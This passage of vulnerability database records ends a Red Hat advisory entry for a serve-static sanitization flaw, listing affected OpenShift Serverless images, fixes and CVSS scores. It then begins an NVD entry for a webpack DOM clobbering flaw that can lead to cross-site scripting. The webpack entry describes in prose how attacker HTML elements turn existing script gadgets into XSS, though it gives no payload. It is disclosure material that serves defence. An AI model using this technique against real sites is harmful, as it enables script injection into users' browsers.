"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, ], }
fkie_cve-2024-43788
Vulnerability from fkie_nvd
Published
2024-08-27 17:15
Modified
2024-09-03 15:15
Severity ?
6.4 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| security-advisories@github.com | https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61 | Patch | |
| security-advisories@github.com | https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270 | ||
| security-advisories@github.com | https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 | Exploit, Vendor Advisory | |
| security-advisories@github.com | https://research.securitum.com/xss-in-amp4email-dom-clobbering | Exploit, Third Party Advisory | |
| security-advisories@github.com | https://scnps.co/papers/sp23_domclob.pdf | Exploit, Mitigation, Technical Description, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| webpack.js | webpack | * |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*", matchCriteriaId: "10BD162E-912D-4458-A67B-F7BC3602FDC5", versionEndExcluding: "5.94.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.", }, { lang: "es", value: "Webpack es un paquete de módulos. Su objetivo principal es agrupar archivos JavaScript para su uso en un navegador, pero también es capaz de transformar, agrupar o empaquetar casi cualquier recurso o activo. Los desarrolladores del paquete web han descubierto una vulnerabilidad de DOM Clobbering en `AutoPublicPathRuntimeModule` de Webpack. El gadget DOM Clobbering en el módulo puede conducir a cross site scripting (XSS) en páginas web donde están presentes elementos HTML controlados por atacantes sin secuencias de comandos (por ejemplo, una etiqueta `img` con un atributo `name` no desinfectado). Se ha observado una explotación de este dispositivo en el mundo real en Canvas LMS, lo que permite que se produzca un ataque XSS a través de un código javascript compilado por Webpack (la parte vulnerable es de Webpack). DOM Clobbering es un tipo de ataque de reutilización de código en el que el atacante primero incrusta un fragmento de marcas HTML aparentemente benignas y sin script en la página web (por ejemplo, a través de una publicación o comentario) y aprovecha los gadgets (fragmentos de código js) que se encuentran en el código javascript existente para transformarlo en código ejecutable. Esta vulnerabilidad puede provocar cross site scripting (XSS) en sitios web que incluyen archivos generados por Webpack y permiten a los usuarios inyectar ciertas etiquetas HTML sin secuencias de comandos con nombres o atributos de identificación desinfectados incorrectamente. Este problema se solucionó en la versión 5.94.0. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para este problema.", }, ], id: "CVE-2024-43788", lastModified: "2024-09-03T15:15:15.937", metrics: { cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 6.4, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", version: "3.1", }, exploitabilityScore: 1.6, impactScore: 4.7, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 2.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2024-08-27T17:15:07.967", references: [ { source: "security-advisories@github.com", tags: [ "Patch", ], url: 